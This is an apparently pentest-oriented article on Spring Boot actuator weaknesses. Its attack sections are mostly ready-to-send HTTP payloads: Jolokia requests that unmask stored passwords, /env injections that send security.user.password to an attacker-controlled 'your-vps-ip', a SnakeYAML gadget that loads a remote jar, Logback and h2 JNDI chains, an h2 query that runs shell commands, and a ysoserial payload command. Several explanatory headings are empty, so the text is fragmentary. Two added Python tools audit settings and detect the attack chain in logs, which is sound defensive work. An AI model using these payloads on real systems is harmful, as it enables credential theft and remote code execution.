Introduction to Spring Boot Related Vulnerabilities

Routing Knowledge

Version Knowledge

Version Interdependencies of Common Components:

Information Leakage

Leakage of routing address and interface call details

Route Exposed by Improper Configuration

/env,/actuator/env

/Jolokia

/trace
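Each of the routes above is an actuator endpoint whose reachability is decided by a handful of properties. The following is an added example, not code from the original article or from the Spring project: a small auditor that parses application.properties text and flags the settings that expose /env, /jolokia and /trace over HTTP, make the environment writable at runtime, or show values unmasked. The property names are the real Spring Boot 1.x, 2.x/3.x and Spring Cloud keys; the two sample configurations are constructed.

```python
"""Audit Spring Boot actuator settings (added example, not from the article).

Reads application.properties-style text and flags the settings that expose the
/env, /jolokia and /trace style routes or let their values be written or shown
in clear. Property names are real Spring Boot / Spring Cloud keys; the sample
configurations below are constructed.
"""

# Actuator endpoints that, when reachable over HTTP, form the leak/RCE surface above.
RISKY_ENDPOINTS = {"env", "jolokia", "httptrace", "refresh", "restart"}

# Constructed: a permissive development profile.
WEAK_CONFIG = """\
management.endpoints.web.exposure.include=*
management.endpoint.env.post.enabled=true
management.endpoint.env.show-values=ALWAYS
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
"""

# Constructed: expose only health, keep env read-only and masked, no h2 console.
HARDENED_CONFIG = """\
management.endpoints.web.exposure.include=health
management.endpoints.web.exposure.exclude=env,jolokia,httptrace,refresh,restart
management.endpoint.env.post.enabled=false
management.endpoint.env.show-values=NEVER
spring.h2.console.enabled=false
"""


def parse_properties(text):
    """Minimal .properties parser: 'key=value' or 'key: value', '#'/'!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        seps = [i for i in (line.find("="), line.find(":")) if i >= 0]
        if not seps:
            continue
        idx = min(seps)  # the first separator of either kind ends the key
        props[line[:idx].strip()] = line[idx + 1:].strip()
    return props


def _csv_set(value):
    return {item.strip().lower() for item in value.split(",") if item.strip()}


def audit(props):
    """Return (severity, key, reason) findings for risky actuator settings."""
    findings = []

    def val(key):
        return props.get(key, "").strip().lower()

    # Spring Boot 1.x: authentication on sensitive endpoints switched off.
    if val("management.security.enabled") == "false":
        findings.append(("critical", "management.security.enabled",
                         "1.x sensitive endpoints (/env, /jolokia, /trace) served without authentication"))
    if val("endpoints.sensitive") == "false":
        findings.append(("high", "endpoints.sensitive", "1.x endpoints globally marked non-sensitive"))

    # Spring Boot 2.x/3.x: which endpoints are exposed over the web.
    include = _csv_set(val("management.endpoints.web.exposure.include"))
    exclude = _csv_set(val("management.endpoints.web.exposure.exclude"))
    if "*" in include:
        findings.append(("high", "management.endpoints.web.exposure.include",
                         "wildcard exposes every actuator endpoint over HTTP"))
        reachable = set(RISKY_ENDPOINTS)
    else:
        reachable = RISKY_ENDPOINTS & include
    reachable = set() if "*" in exclude else reachable - exclude
    for ep in sorted(reachable):
        findings.append(("high", "management.endpoints.web.exposure.include",
                         f"/actuator/{ep} is reachable over HTTP"))

    # Spring Cloud: POST /actuator/env writes properties into the live Environment.
    # Only the explicit setting is checked; with spring-cloud-context on the classpath
    # the endpoint is on unless this key is set to false.
    if val("management.endpoint.env.post.enabled") == "true":
        findings.append(("high", "management.endpoint.env.post.enabled",
                         "environment is writable at runtime (env-injection chain)"))

    # Spring Boot 3.x: env values stay masked unless show-values is relaxed.
    if val("management.endpoint.env.show-values") == "always":
        findings.append(("medium", "management.endpoint.env.show-values",
                         "env values shown in clear instead of masked"))

    # h2 web console: the surface of the h2 sections further down.
    if val("spring.h2.console.enabled") == "true":
        findings.append(("high", "spring.h2.console.enabled", "h2 web console enabled"))
    if val("spring.h2.console.settings.web-allow-others") == "true":
        findings.append(("high", "spring.h2.console.settings.web-allow-others",
                         "h2 console accepts non-local clients"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        results = audit(parse_properties(cfg))
        print(f"{name}: {len(results)} finding(s)")
        for severity, key, reason in results:
            print(f"  [{severity}] {key}: {reason}")
```

Run it against a real application.properties to see which of the routes in this section are actually reachable; the exclude list is honoured over the include list, which is how Spring resolves the two keys.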

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 1)

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

POST /jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

POST /actuator/jolokia
Content-Type: application/json

{"mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", "operation": "getProperty", "type": "EXEC", "arguments": ["security.user.password"]}

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 2)

nc -lvk 80

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://value:${security.user.password}@your-vps-ip

POST /actuator/env
Content-Type: application/json

{"name": "eureka.client.serviceUrl.defaultZone", "value": "http://value:${security.user.password}@your-vps-ip"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json
Authorization: Basic dmFsdWU6MTIzNDU2

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 3)

nc -lvk 80

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}

POST /actuator/env
Content-Type: application/json

{"name": "spring.cloud.bootstrap.location", "value": "http://your-vps-ip/?=${security.user.password}"}

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/${security.user.password}

POST /actuator/env
Content-Type: application/json

{"name": "eureka.client.serviceUrl.defaultZone", "value": "http://your-vps-ip/${security.user.password}"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Obtain the Plaintext of the Password Desensitized by the Asterisk (method 4)

Remote Code Execution

White Label Error Page SpEL RCE

# coding: utf-8

# Turn each character of the command string into its hex code point,
# joined with commas (the form the SpEL payload expects).
result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

Vulnerability Analysis:

http://127.0.0.1:9091/article?id=66

Spring Cloud SnakeYAML RCE

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://your-vps-ip/example.jar"]
  ]]
]

POST /env
Content-Type: application/x-www-form-urlencoded

spring.cloud.bootstrap.location=http://your-vps-ip/example.yml

POST /actuator/env
Content-Type: application/json

{"name": "spring.cloud.bootstrap.location", "value": "http://your-vps-ip/example.yml"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Vulnerability Principle:

http://127.0.0.1:9092/env

Eureka XStream Deserialization RCE

Conditions of use:

nc -lvp 443

POST /env
Content-Type: application/x-www-form-urlencoded

eureka.client.serviceUrl.defaultZone=http://your-vps-ip/example

POST /actuator/env
Content-Type: application/json

{"name": "eureka.client.serviceUrl.defaultZone", "value": "http://your-vps-ip/example"}

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Vulnerability Principle:

http://127.0.0.1:9093/env

Jolokia Logback JNDI RCE

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80

<configuration>
  <insertFromJNDI env-entry-name="ldap://your-vps-ip:1389/JNDIObject" as="appName" />
</configuration>

javac -source 1.5 -target 1.5 JNDIObject.java
nc -lv 443

Vulnerability Principle:

Vulnerability Analysis:

http://127.0.0.1:9094/env

Jolokia Realm JNDI RCE

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
nc -lvp 443

Vulnerability principle:

Vulnerability Analysis:

http://127.0.0.1:9094/env

h2 Database Query RCE

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.hikari.connection-test-query=CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');

POST /actuator/env
Content-Type: application/json

{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/c','calc');"}

Spring 1.x

POST /restart
Content-Type: application/x-www-form-urlencoded
POST /actuator/restart
Content-Type: application/json

Vulnerability Principle:

Vulnerability Analysis:

http://127.0.0.1:9096/actuator/env

h2 Database Console JNDI RCE

javac -source 1.5 -target 1.5 JNDIObject.java

# Use python to quickly start the http server
python2 -m SimpleHTTPServer 80
python3 -m http.server 80
nc -lv 443

Vulnerability Analysis:

http://127.0.0.1:9096/h2-console

MySQL Jdbc Deserialization RCE

java -jar ysoserial.jar CommonsCollections3 calc > payload.ser

POST /env
Content-Type: application/x-www-form-urlencoded

spring.datasource.url=corresponding property value

POST /refresh
Content-Type: application/x-www-form-urlencoded

POST /actuator/refresh
Content-Type: application/json

Vulnerability principle:

Vulnerability Analysis:

http://127.0.0.1:9097/actuator/env
http://127.0.0.1:9097/product/list
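The password-extraction methods and the SnakeYAML, Eureka XStream, h2 and MySQL JDBC sections above all follow one request chain: a POST that writes a property into the running application (/env, /actuator/env, or a Jolokia EXEC operation), followed by a POST to /refresh or /restart that makes the application act on it. The following is an added example, not code from the original article or from any project it cites: a detector for that chain run over access-log lines in Common Log Format. The sample log lines, their RFC 5737 client addresses, timestamps and paths are constructed.

```python
"""Detect the actuator env-injection request chain (added example, not from the article).

Every technique above that rewrites a property follows the same shape: a POST that
writes configuration (/env, /actuator/env, or a Jolokia EXEC operation) followed by
a POST to /refresh or /restart that makes the application act on it. This walks
access-log lines in Common Log Format and reports that chain per client. The
sample log lines are constructed (RFC 5737 documentation addresses).
"""
import re
from datetime import datetime

# Common Log Format: client - - [timestamp] "METHOD path PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoints that write configuration into the running application.
WRITE_PATHS = {"/env", "/actuator/env", "/jolokia", "/actuator/jolokia"}
# Endpoints that make a written property take effect.
APPLY_PATHS = {"/refresh", "/actuator/refresh", "/restart", "/actuator/restart"}
# Read-only endpoints that still leak configuration and routing details.
LEAK_PATHS = {"/env", "/actuator/env", "/trace", "/actuator/httptrace",
              "/jolokia", "/actuator/jolokia"}

# Constructed sample: one client reads env, writes it, then refreshes; another is benign.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /actuator/env HTTP/1.1" 200 5123
203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "POST /actuator/env HTTP/1.1" 200 87
203.0.113.7 - - [10/Oct/2023:13:55:14 +0000] "POST /actuator/refresh HTTP/1.1" 200 42
198.51.100.2 - - [10/Oct/2023:13:56:30 +0000] "GET /actuator/health HTTP/1.1" 200 15
198.51.100.2 - - [10/Oct/2023:13:57:02 +0000] "GET /product/list HTTP/1.1" 200 1890
not a log line
""".splitlines()


def parse_line(line):
    """Parse one CLF line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    # Drop the query string and a trailing slash so /actuator/env/ matches /actuator/env.
    rec["path"] = rec["path"].split("?", 1)[0].rstrip("/") or "/"
    return rec


def detect(lines, window_seconds=300):
    """Return (client, severity, description) findings in log order."""
    findings = []
    last_write = {}  # client -> time of its most recent successful property write
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, method, path, status = rec["ip"], rec["method"], rec["path"], rec["status"]
        if method == "GET" and path in LEAK_PATHS and status == 200:
            findings.append((ip, "medium", f"successful read of {path}"))
        if method == "POST" and path in WRITE_PATHS:
            findings.append((ip, "high", f"property write via {path} (status {status})"))
            if 200 <= status < 300:
                last_write[ip] = rec["time"]
        if method == "POST" and path in APPLY_PATHS and ip in last_write:
            delta = (rec["time"] - last_write[ip]).total_seconds()
            if 0 <= delta <= window_seconds:
                findings.append((ip, "critical",
                                 f"{path} {int(delta)}s after a property write: env-injection chain"))
    return findings


if __name__ == "__main__":
    for ip, severity, description in detect(SAMPLE_LOG):
        print(f"[{severity}] {ip}: {description}")
```

A successful GET of /env on its own is only a leak signal; the write is rated high because there is no legitimate reason for an external client to change properties at runtime, and the refresh or restart that follows a write within the window is what distinguishes the chain from noise.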
